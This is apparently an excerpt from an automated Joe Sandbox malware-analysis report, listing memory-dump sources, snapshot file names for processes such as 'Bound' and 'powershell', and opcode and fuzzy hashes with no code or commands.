                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P;]
                                                                                                                    • API String ID: 0-3130340819
                                                                                                                    • Opcode ID: 8aac64cb718b5695fc5417cc6ef3e0a6347d9bbf7c6c46a3fa4092ac2bbd7f7e
                                                                                                                    • Instruction ID: f0a130a5b7d8450b6b9902f4bd8027a2b7f4d2ab71df9887679a18c57f0769cc
                                                                                                                    • Opcode Fuzzy Hash: 8aac64cb718b5695fc5417cc6ef3e0a6347d9bbf7c6c46a3fa4092ac2bbd7f7e
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
• String ID:
• API String ID:
• Opcode ID: 2c1d750e0a848ab7f9dd740d6934277894f653b0ef4c013f2e2af6a4894519a7
• Instruction ID: ceac0223c6e1a008e82efa96115977bb9d7956a3717665e2872ca7956ba6e637
• Opcode Fuzzy Hash: 2c1d750e0a848ab7f9dd740d6934277894f653b0ef4c013f2e2af6a4894519a7
• Instruction Fuzzy Hash: 60717730A0954D8FEB55DB68D861FA8BBB1EF9E318F4806F9E048DB2D7CD24A841C711

Memory Dump Source
• Source File: 00000012.00000002.2374680789.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ffd9bad0000_Bound.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc3e35d564a615864dba33c122f7c74892d538ef64591308b5e6380ee27e7989
• Instruction ID: 254e342e2624a90e3efbed5cbc1c0064380734a88d5bfea11ef7f66f6673b5f8
• Opcode Fuzzy Hash: fc3e35d564a615864dba33c122f7c74892d538ef64591308b5e6380ee27e7989
• Instruction Fuzzy Hash: C2E06F3190AA4C5BCB20AB699C202D936A2FBCE308F00022DE44CD3180E33A5688C30A

Memory Dump Source
• Source File: 00000014.00000002.2041766920.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_7ffd9bac0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
• Instruction ID: ee59faf03481a4826278b3042e26341a3348b81f49576dea66fea955f9f1e53b
• Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
• Instruction Fuzzy Hash: 5801447121CB0C4FD748EF0CE451AA5B7E0FB95364F10066DE58AC76A5DA36E882CB45

Memory Dump Source
• Source File: 0000001B.00000002.2122475166.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ffd9bab0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction ID: 17cf545b06c68c12749fae18c059a1fd3c0929f1bc305d672c46b898a287b68f
• Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
• Instruction Fuzzy Hash: 8301A73120CB0C4FD748EF0CE051AA6B3E0FF85320F10056EE58AC36A1DA32E882CB45

Memory Dump Source
• Source File: 0000001E.00000002.2229545818.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_7ffd9baa0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ee6a48b50bec202467d4e2bb54c60ca84e7c308efdb1dd157925d32c71b31ce
• Instruction ID: fe27c77d210453ff9ac8e18656f571fdffb2d1ba2cecbf8df11bf048f1b1a8d7
• Opcode Fuzzy Hash: 5ee6a48b50bec202467d4e2bb54c60ca84e7c308efdb1dd157925d32c71b31ce
• Instruction Fuzzy Hash: 5B01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5DA36E882CB45

Memory Dump Source
• Source File: 00000021.00000002.2342785655.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_7ffd9ba90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0c97eb58c76ab628996e3617ddc048fdde98264560ca4b81bbdf52808bed74b2
• Instruction ID: 627da323b74165e897b80f8164bf9b00e1793352cd0bfc28d8964fc9c2b98573
• Opcode Fuzzy Hash: 0c97eb58c76ab628996e3617ddc048fdde98264560ca4b81bbdf52808bed74b2
• Instruction Fuzzy Hash: 1201843020CB0C4FD748EF0CE051AA6B3E0FB85320F10056DE58AC36A1DA22E881CB45